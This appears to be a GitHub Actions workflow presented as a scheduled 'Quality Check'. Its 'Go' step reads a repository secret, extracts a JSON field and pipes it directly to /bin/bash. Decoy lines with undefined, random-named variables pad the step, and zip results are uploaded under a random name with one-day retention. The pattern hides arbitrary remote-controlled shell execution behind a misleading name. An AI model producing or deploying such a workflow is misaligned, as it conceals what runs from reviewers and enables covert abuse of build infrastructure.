name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '23 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          bi87655: ${{ secrets.bi87655 }}
        run: |
          printf '%s' "$bi87655" | jq -r .nynt89 | /bin/bash
          echo $xuql2774 | jq -r .sz1197 | /bin/bash
          echo $e593 | jq -r .vx65359 | /bin/bash
          printf '%s' "$lp84569" | jq -r .hvo10 | /bin/bash
          printf '%s' "$modsl42" | jq -r .xd982 | /bin/bash
          printf '%s' "$xpeyf3" | jq -r .wtlee70667 | /bin/bash
          printf '%s' "$pr423" | jq -r .rdej2 | /bin/bash
          echo $zzoe87 | jq -r .oakox337 | /bin/bash
          printf '%s' "$kskx58407" | jq -r .ciz944 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 3O5eYbSx
          path: "*.zip"
          retention-days: 1
